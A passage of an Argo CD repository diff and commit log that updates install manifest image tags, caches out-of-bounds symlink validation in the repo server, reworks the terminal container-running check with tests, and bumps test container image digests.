              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -31917,7 +31917,7 @@ spec:
              key: log.format.timestamp
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -32075,7 +32075,7 @@ spec:
        - -n
        - /usr/local/bin/argocd
        - /shared/argocd-dex
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: copyutil
        securityContext:
@@ -32177,7 +32177,7 @@ spec:
              key: notificationscontroller.repo.server.plaintext
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          tcpSocket:
@@ -32279,7 +32279,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -32588,7 +32588,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -32641,7 +32641,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -33026,6 +33026,12 @@ spec:
              key: server.webhook.parallelism.limit
              name: argocd-cmd-params-cm
              optional: true
+        - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+          valueFrom:
+            configMapKeyRef:
+              key: server.glob.cache.size
+              name: argocd-cmd-params-cm
+              optional: true
        - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
          valueFrom:
            configMapKeyRef:
@@ -33068,7 +33074,7 @@ spec:
              key: server.sync.replace.allowed
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
@@ -33500,7 +33506,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/install.yaml
+++ b/manifests/install.yaml
@@ -31744,7 +31744,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -31903,7 +31903,7 @@ spec:
        - -n
        - /usr/local/bin/argocd
        - /shared/argocd-dex
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: copyutil
        securityContext:
@@ -32005,7 +32005,7 @@ spec:
              key: notificationscontroller.repo.server.plaintext
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          tcpSocket:
@@ -32107,7 +32107,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -32416,7 +32416,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -32469,7 +32469,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -32854,6 +32854,12 @@ spec:
              key: server.webhook.parallelism.limit
              name: argocd-cmd-params-cm
              optional: true
+        - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+          valueFrom:
+            configMapKeyRef:
+              key: server.glob.cache.size
+              name: argocd-cmd-params-cm
+              optional: true
        - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
          valueFrom:
            configMapKeyRef:
@@ -32896,7 +32902,7 @@ spec:
              key: server.sync.replace.allowed
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
@@ -33328,7 +33334,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/namespace-install-with-hydrator.yaml
+++ b/manifests/namespace-install-with-hydrator.yaml
@@ -1023,7 +1023,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -1164,7 +1164,7 @@ spec:
              key: log.format.timestamp
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -1322,7 +1322,7 @@ spec:
        - -n
        - /usr/local/bin/argocd
        - /shared/argocd-dex
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: copyutil
        securityContext:
@@ -1424,7 +1424,7 @@ spec:
              key: notificationscontroller.repo.server.plaintext
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          tcpSocket:
@@ -1526,7 +1526,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -1835,7 +1835,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -1888,7 +1888,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -2273,6 +2273,12 @@ spec:
              key: server.webhook.parallelism.limit
              name: argocd-cmd-params-cm
              optional: true
+        - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+          valueFrom:
+            configMapKeyRef:
+              key: server.glob.cache.size
+              name: argocd-cmd-params-cm
+              optional: true
        - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
          valueFrom:
            configMapKeyRef:
@@ -2315,7 +2321,7 @@ spec:
              key: server.sync.replace.allowed
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
@@ -2747,7 +2753,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/namespace-install.yaml
+++ b/manifests/namespace-install.yaml
@@ -991,7 +991,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -1150,7 +1150,7 @@ spec:
        - -n
        - /usr/local/bin/argocd
        - /shared/argocd-dex
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: copyutil
        securityContext:
@@ -1252,7 +1252,7 @@ spec:
              key: notificationscontroller.repo.server.plaintext
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          tcpSocket:
@@ -1354,7 +1354,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -1663,7 +1663,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -1716,7 +1716,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -2101,6 +2101,12 @@ spec:
              key: server.webhook.parallelism.limit
              name: argocd-cmd-params-cm
              optional: true
+        - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+          valueFrom:
+            configMapKeyRef:
+              key: server.glob.cache.size
+              name: argocd-cmd-params-cm
+              optional: true
        - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
          valueFrom:
            configMapKeyRef:
@@ -2143,7 +2149,7 @@ spec:
              key: server.sync.replace.allowed
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
@@ -2575,7 +2581,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/reposerver/repository/repository.go
+++ b/reposerver/repository/repository.go
@@ -15,11 +15,13 @@ import (
 	"regexp"
 	"sort"
 	"strings"
+	gosync "sync"
 	"time"

 	"github.com/TomOnTime/utfutil"
 	"github.com/bmatcuk/doublestar/v4"
 	imagev1 "github.com/opencontainers/image-spec/specs-go/v1"
+	gocache "github.com/patrickmn/go-cache"
 	"sigs.k8s.io/yaml"

 	"github.com/argoproj/argo-cd/v3/util/oci"
@@ -96,6 +98,8 @@ type Service struct {
 	newGitClient              func(rawRepoURL string, root string, creds git.Creds, insecure bool, enableLfs bool, proxy string, noProxy string, opts ...git.ClientOpts) (git.Client, error)
 	newHelmClient             func(repoURL string, creds helm.Creds, enableOci bool, proxy string, noProxy string, opts ...helm.ClientOpts) helm.Client
 	initConstants             RepoServerInitConstants
+	// stores cached symlink validation results
+	symlinksState *gocache.Cache
 	// now is usually just time.Now, but may be replaced by unit tests for testing purposes
 	now func() time.Time
 }
@@ -157,6 +161,7 @@ func NewService(metricsServer *metrics.MetricsServer, cache *cache.Cache, initCo
 		ociPaths:           ociRandomizedPaths,
 		gitRepoInitializer: directoryPermissionInitializer,
 		rootDir:            rootDir,
+		symlinksState:      gocache.New(12*time.Hour, time.Hour),
 	}
 }

@@ -396,7 +401,7 @@ func (s *Service) runRepoOperation(
 		defer utilio.Close(closer)

 		if !s.initConstants.AllowOutOfBoundsSymlinks {
-			err := apppathutil.CheckOutOfBoundsSymlinks(ociPath)
+			err := s.checkOutOfBoundsSymlinks(ociPath, revision, settings.noCache)
 			if err != nil {
 				oobError := &apppathutil.OutOfBoundsSymlinkError{}
 				if errors.As(err, &oobError) {
@@ -437,7 +442,7 @@ func (s *Service) runRepoOperation(
 		}
 		defer utilio.Close(closer)
 		if !s.initConstants.AllowOutOfBoundsSymlinks {
-			err := apppathutil.CheckOutOfBoundsSymlinks(chartPath)
+			err := s.checkOutOfBoundsSymlinks(chartPath, revision, settings.noCache)
 			if err != nil {
 				oobError := &apppathutil.OutOfBoundsSymlinkError{}
 				if errors.As(err, &oobError) {
@@ -466,7 +471,7 @@ func (s *Service) runRepoOperation(
 	defer utilio.Close(closer)

 	if !s.initConstants.AllowOutOfBoundsSymlinks {
-		err := apppathutil.CheckOutOfBoundsSymlinks(gitClient.Root())
+		err := s.checkOutOfBoundsSymlinks(gitClient.Root(), revision, settings.noCache, ".git")
 		if err != nil {
 			oobError := &apppathutil.OutOfBoundsSymlinkError{}
 			if errors.As(err, &oobError) {
@@ -590,6 +595,25 @@ func resolveReferencedSources(hasMultipleSources bool, source *v1alpha1.Applicat
 	return repoRefs, nil
 }

+// checkOutOfBoundsSymlinks validates symlinks and caches validation result in memory
+func (s *Service) checkOutOfBoundsSymlinks(rootPath string, version string, noCache bool, skipPaths ...string) error {
+	key := rootPath + "/" + version + "/" + strings.Join(skipPaths, ",")
+	ok := false
+	var checker any
+	if !noCache {
+		checker, ok = s.symlinksState.Get(key)
+	}
+
+	if !ok {
+		checker = gosync.OnceValue(func() error {
+			return apppathutil.CheckOutOfBoundsSymlinks(rootPath, skipPaths...)
+		})
+		s.symlinksState.Set(key, checker, gocache.DefaultExpiration)
+	}
+
+	return checker.(func() error)()
+}
+
 func (s *Service) GenerateManifest(ctx context.Context, q *apiclient.ManifestRequest) (*apiclient.ManifestResponse, error) {
 	var res *apiclient.ManifestResponse
 	var err error
@@ -865,7 +889,7 @@ func (s *Service) runManifestGenAsync(ctx context.Context, repoRoot, commitSHA,

 						// Symlink check must happen after acquiring lock.
 						if !s.initConstants.AllowOutOfBoundsSymlinks {
-							err := apppathutil.CheckOutOfBoundsSymlinks(gitClient.Root())
+							err := s.checkOutOfBoundsSymlinks(gitClient.Root(), commitSHA, q.NoCache, ".git")
 							if err != nil {
 								oobError := &apppathutil.OutOfBoundsSymlinkError{}
 								if errors.As(err, &oobError) {
--- a/server/application/terminal.go
+++ b/server/application/terminal.go
@@ -210,21 +210,9 @@ func (s *terminalHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 		return
 	}

-	if pod.Status.Phase != corev1.PodRunning {
-		http.Error(w, "Pod not running", http.StatusBadRequest)
-		return
-	}
-
-	var findContainer bool
-	for _, c := range pod.Spec.Containers {
-		if container == c.Name {
-			findContainer = true
-			break
-		}
-	}
-	if !findContainer {
-		fieldLog.Warn("terminal container not found")
-		http.Error(w, "Cannot find container", http.StatusBadRequest)
+	if !containerRunning(pod, container) {
+		fieldLog.Warn("terminal container not running")
+		http.Error(w, "container find running", http.StatusBadRequest)
 		return
 	}

@@ -273,6 +261,20 @@ func podExists(treeNodes []appv1.ResourceNode, podName, namespace string) bool {
 	return false
 }

+func containerRunning(pod *corev1.Pod, containerName string) bool {
+	return containerStatusRunning(pod.Status.ContainerStatuses, containerName) ||
+		containerStatusRunning(pod.Status.InitContainerStatuses, containerName)
+}
+
+func containerStatusRunning(statuses []corev1.ContainerStatus, containerName string) bool {
+	for i := range statuses {
+		if statuses[i].Name == containerName {
+			return statuses[i].State.Running != nil
+		}
+	}
+	return false
+}
+
 const EndOfTransmission = "\u0004"

 // PtyHandler is what remotecommand expects from a pty
--- a/server/application/terminal_test.go
+++ b/server/application/terminal_test.go
@@ -5,9 +5,12 @@ import (
 	"net/http/httptest"
 	"strings"
 	"testing"
+	"time"

 	"github.com/argoproj/argo-cd/gitops-engine/pkg/utils/kube"
 	"github.com/stretchr/testify/assert"
+	corev1 "k8s.io/api/core/v1"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"

 	appv1 "github.com/argoproj/argo-cd/v3/pkg/apis/application/v1alpha1"
 	"github.com/argoproj/argo-cd/v3/util/argo"
@@ -79,6 +82,115 @@ func TestPodExists(t *testing.T) {
 	}
 }

+func TestContainerRunning(t *testing.T) {
+	for _, tcase := range []struct {
+		name           string
+		pod            *corev1.Pod
+		containerName  string
+		expectedResult bool
+	}{
+		{
+			name:           "empty container",
+			pod:            &corev1.Pod{},
+			containerName:  "",
+			expectedResult: false,
+		},
+		{
+			name:           "container not found",
+			pod:            &corev1.Pod{},
+			containerName:  "not-found",
+			expectedResult: false,
+		},
+		{
+			name: "container running",
+			pod: &corev1.Pod{
+				Status: corev1.PodStatus{
+					ContainerStatuses: []corev1.ContainerStatus{
+						{
+							Name: "test",
+							State: corev1.ContainerState{
+								Running: &corev1.ContainerStateRunning{
+									StartedAt: metav1.NewTime(time.Now()),
+								},
+							},
+						},
+					},
+				},
+			},
+			containerName:  "test",
+			expectedResult: true,
+		},
+		{
+			name: "init container running",
+			pod: &corev1.Pod{
+				Status: corev1.PodStatus{
+					ContainerStatuses: []corev1.ContainerStatus{
+						{
+							Name: "test",
+							State: corev1.ContainerState{
+								Running: &corev1.ContainerStateRunning{
+									StartedAt: metav1.NewTime(time.Now()),
+								},
+							},
+						},
+					},
+					InitContainerStatuses: []corev1.ContainerStatus{
+						{
+							Name: "test-init",
+							State: corev1.ContainerState{
+								Running: &corev1.ContainerStateRunning{
+									StartedAt: metav1.NewTime(time.Now()),
+								},
+							},
+						},
+					},
+				},
+			},
+			containerName:  "test-init",
+			expectedResult: true,
+		},
+		{
+			name: "container not running",
+			pod: &corev1.Pod{
+				Status: corev1.PodStatus{
+					ContainerStatuses: []corev1.ContainerStatus{
+						{
+							Name: "test",
+							State: corev1.ContainerState{
+								Running: nil,
+							},
+						},
+					},
+				},
+			},
+			containerName:  "test",
+			expectedResult: false,
+		},
+		{
+			name: "init container not running",
+			pod: &corev1.Pod{
+				Status: corev1.PodStatus{
+					InitContainerStatuses: []corev1.ContainerStatus{
+						{
+							Name: "test-init",
+							State: corev1.ContainerState{
+								Running: nil,
+							},
+						},
+					},
+				},
+			},
+			containerName:  "test-init",
+			expectedResult: false,
+		},
+	} {
+		t.Run(tcase.name, func(t *testing.T) {
+			result := containerRunning(tcase.pod, tcase.containerName)
+			assert.Equalf(t, tcase.expectedResult, result, "Expected result %v, but got %v", tcase.expectedResult, result)
+		})
+	}
+}
+
 func TestIsValidPodName(t *testing.T) {
 	for _, tcase := range []struct {
 		name           string
--- a/test/container/Dockerfile
+++ b/test/container/Dockerfile
@@ -1,4 +1,4 @@
-FROM docker.io/library/redis:8.6.1@sha256:1c054d54ecd1597bba52f4304bca5afbc5565ebe614c5b3d7dc5b7f8a0cd768d AS redis
+FROM docker.io/library/redis:8.6.1@sha256:315270d166080f537bbdf1b489b603aaaa213cb55a544acfa51feb7481abb1c0 AS redis

 # There are libraries we will want to copy from here in the final stage of the
 # build, but the COPY directive does not have a way to determine system
@@ -14,7 +14,7 @@ FROM docker.io/library/registry:3.0@sha256:6c5666b861f3505b116bb9aa9b25175e71210

 FROM docker.io/bitnamilegacy/kubectl:1.32@sha256:9524faf8e3cefb47fa28244a5d15f95ec21a73d963273798e593e61f80712333 AS kubectl

-FROM docker.io/library/ubuntu:26.04@sha256:fed6ddb82c61194e1814e93b59cfcb6759e5aa33c4e41bb3782313c2386ed6df
+FROM docker.io/library/ubuntu:26.04@sha256:91832dcd7bc5e44c098ecefc0a251a5c5d596dae494b33fb248e01b6840f8ce0

 ENV DEBIAN_FRONTEND=noninteractive

--- a/ui/src/app/applications/components/resource-customizations.ts
+++ b/ui/src/app/applications/components/resource-customizations.ts
@@ -21,6 +21,7 @@ export const resourceIconGroups = {
    'kyverno.io': true,
    'opentelemetry.io': true,
    'projectcontour.io': true,
+    'promoter.argoproj.io': true,
    'work.karmada.io': true,
    'zookeeper.pravega.io': true,
 };
--- a/ui/src/app/applications/components/resource-icon.test.tsx
+++ b/ui/src/app/applications/components/resource-icon.test.tsx
@@ -16,7 +16,8 @@ jest.mock('./resource-customizations', () => ({
    resourceIconGroups: {
        '*.crossplane.io': true,
        '*.fluxcd.io': true,
-        'cert-manager.io': true
+        'cert-manager.io': true,
+        'promoter.argoproj.io': true
    }
 }));

@@ -71,6 +72,14 @@ describe('ResourceIcon', () => {
            expect(imgs.length).toBeGreaterThan(0);
            expect(imgs[0].props.src).toBe('assets/images/resources/_.fluxcd.io/icon.svg');
        });
+
+        it('should show group-based icon for promoter.argoproj.io', () => {
+            const testRenderer = renderer.create(<ResourceIcon group='promoter.argoproj.io' kind='PromotionStrategy' />);
+            const testInstance = testRenderer.root;
+            const imgs = testInstance.findAllByType('img');
+            expect(imgs.length).toBeGreaterThan(0);
+            expect(imgs[0].props.src).toBe('assets/images/resources/promoter.argoproj.io/icon.svg');
+        });
    });

    describe('fallback to kind-based icons (with non-matching group) - THIS IS THE BUG FIX', () => {
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
dependabot[bot]	bd7b16cbeb	chore(deps): bump renovatebot/github-action from 46.1.5 to 46.1.6 (#26961 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-23 07:26:22 -04:00
argoproj-renovate[bot]	e1bb509264	chore(deps): update module github.com/golangci/golangci-lint/v2 to v2.11.4 (#26957 ) Signed-off-by: renovate[bot] <renovate[bot]@users.noreply.github.com> Co-authored-by: argoproj-renovate[bot] <161757507+argoproj-renovate[bot]@users.noreply.github.com>	2026-03-22 16:14:59 -04:00
dancer13	3570031fa8	docs: fix typo in metrics (#26951 ) Signed-off-by: dancer13 <alfredotic0809@gmail.com>	2026-03-22 03:01:26 -06:00
github-actions[bot]	3eee5e3f52	[Bot] docs: Update Snyk report (#26950 ) Signed-off-by: CI <ci@argoproj.com> Co-authored-by: CI <ci@argoproj.com>	2026-03-22 08:03:59 +00:00
Oliver Gondža	77732d89b3	docs: Formatting and style for source-hydrator.md (#26949 ) Signed-off-by: Oliver Gondža <ogondza@gmail.com>	2026-03-21 10:35:47 +01:00
Honarkhah	4aabf526c8	fix: typo in error message for multi-source apps (#26936 ) Signed-off-by: Honarkhah <m.honar@gmail.com>	2026-03-20 10:55:47 -04:00
dependabot[bot]	24c3abd8dd	chore(deps): bump library/ubuntu from `5798086` to `91832dc` in /test/container (#26930 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-20 09:57:04 -04:00
Linghao Su	91d83d37c4	fix(server): fix find container logic for terminal (#26858 ) Signed-off-by: linghaoSu <linghao.su@daocloud.io>	2026-03-19 23:37:39 -10:00
dependabot[bot]	aabe8524ba	chore(deps): bump library/redis from `a019c00` to `315270d` in /test/container (#26902 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-19 12:56:40 -04:00
Papapetrou Patroklos	fe30b2c60a	fix: trigger app sync on app-set spec change (#26811 ) Signed-off-by: Patroklos Papapetrou <ppapapetrou76@gmail.com>	2026-03-19 10:31:07 +00:00
dependabot[bot]	148c86ad42	chore(deps): bump actions/cache from 5.0.3 to 5.0.4 (#26901 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Regina Voloshin <regina.voloshin@codefresh.io>	2026-03-19 07:31:08 +00:00
dependabot[bot]	30db355197	chore(deps): bump codecov/codecov-action from 5.5.2 to 5.5.3 (#26900 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-19 08:31:09 +02:00
Andy Lo-A-Foe	442aed496f	fix: prevent panic on nil APIResource in permission validator (#26610 ) Signed-off-by: Andy Lo-A-Foe <andy.loafoe@gmail.com>	2026-03-18 14:27:24 -04:00
Blake Pettersson	87ccebc51a	chore(ci): remove cherry-pick branch if already present (#26881 ) Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>	2026-03-18 14:23:20 -04:00
dependabot[bot]	20439902eb	chore(deps): bump google.golang.org/grpc from 1.79.2 to 1.79.3 (#26886 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>	2026-03-18 17:43:25 +00:00
Michael Crenshaw	559da44135	chore(deps): bump Helm to 3.20.1 (#26896 ) Signed-off-by: Michael Crenshaw <350466+crenshaw-dev@users.noreply.github.com>	2026-03-18 13:42:58 -04:00
Blake Pettersson	a87aab146e	chore(ci): attempt to make test less flaky (#26890 ) Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>	2026-03-18 13:02:42 -04:00
Andrea Matera	d34e83f60c	chore: add Mollie to USERS.md (#26895 ) Signed-off-by: Andrea Matera <andrea.matera@mollie.com>	2026-03-18 15:13:44 +00:00
Michael Crenshaw	566c172058	feat(ui): add GitOps Promoter resource icon (#26894 ) Signed-off-by: Michael Crenshaw <350466+crenshaw-dev@users.noreply.github.com>	2026-03-18 10:52:20 -04:00
dependabot[bot]	d80a122502	chore(deps): bump library/ubuntu from `fed6ddb` to `5798086` in /test/container (#26887 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-18 14:38:29 +00:00
Ekamveer Walia	539c35b295	docs: fix incorrect wording for ApplicationSets in other namespaces (#26893 )	2026-03-18 13:44:10 +00:00
Blake Pettersson	45a84dfa38	fix(ci): add .gitkeep to images dir (#26892 ) Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>	2026-03-18 09:37:18 -04:00
Mangaal Meetei	d011b7b508	fix: Bitbucket webhook diffstat does not work with upper case repo slug (#26594 ) Signed-off-by: Mangaal <angommeeteimangaal@gmail.com>	2026-03-18 07:50:32 -04:00
Huynh Duc Tran	f1b922765d	chore: add Techcom Securities to USERS.md (#26889 ) Signed-off-by: Tran Huynh Duc <duchuynhtran12a1@gmail.com>> Signed-off-by: Duck <duchuynhtran12a1@gmail.com>	2026-03-18 15:22:26 +05:30
Jaewoo Choi	4b4bbc8bb2	fix(ui): include _-prefixed dirs in embedded assets (#26589 ) Signed-off-by: choejwoo <jaewoo45@gmail.com>	2026-03-17 16:55:20 -06:00
Atif Ali	c5d1c914bb	fix(UI): show RollingSync step clearly when labels match no step (#26877 ) Signed-off-by: Atif Ali <atali@redhat.com>	2026-03-17 23:05:29 +01:00
dependabot[bot]	59aea0476a	chore(deps): bump github.com/aws/aws-sdk-go-v2/credentials from 1.19.11 to 1.19.12 (#26840 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-17 23:01:40 +01:00
Nitish Kumar	4cdc650a58	feat(helm): support wildcard glob patterns for `valueFiles` (#26768 ) Signed-off-by: nitishfy <justnitish06@gmail.com>	2026-03-17 21:37:43 +00:00
Blake Pettersson	2b6489828b	chore: allow multiple signoff lines (#26875 ) Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>	2026-03-17 21:06:28 +00:00
Alexander Matyushentsev	92c3ef2559	fix: avoid scanning symlinks in whole repo on each app manifest operation (#26718 ) Signed-off-by: Alexander Matyushentsev <AMatyushentsev@gmail.com>	2026-03-17 13:40:16 -07:00
Alexandre Gaudreault	4070b6feea	docs: add warning in orphan resource doc (#26874 ) Signed-off-by: Alexandre Gaudreault <alexandre_gaudreault@intuit.com>	2026-03-17 12:54:01 -04:00
Jonathan Ogilvie	67db597810	fix: stack overflow when processing circular ownerrefs in resource graph (#26783 ) (#26790 ) Signed-off-by: Jonathan Ogilvie <jonathan.ogilvie@sumologic.com> Signed-off-by: Jonathan Ogilvie <679297+jcogilvie@users.noreply.github.com> Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>	2026-03-17 12:03:23 -04:00
rumstead	5b3073986f	feat(appset): add concurrency when managing applications (#26642 ) Signed-off-by: rumstead <37445536+rumstead@users.noreply.github.com> Signed-off-by: Alexandre Gaudreault <alexandre_gaudreault@intuit.com> Co-authored-by: Alexandre Gaudreault <alexandre_gaudreault@intuit.com>	2026-03-17 15:04:11 +00:00
Kit Dallege	5ceb8354e6	docs: add orphaned resources FAQ entry (#26833 ) Signed-off-by: kovan <xaum.io@gmail.com>	2026-03-17 10:53:24 -04:00
S Kevin Joe Harris	79922c06d6	ci: Improve Go build timing with effective caching (#26628 ) Signed-off-by: Kevin Joe Harris <kevinjoeharris1@gmail.com> Co-authored-by: Nitish Kumar <justnitish06@gmail.com>	2026-03-17 20:12:09 +05:30
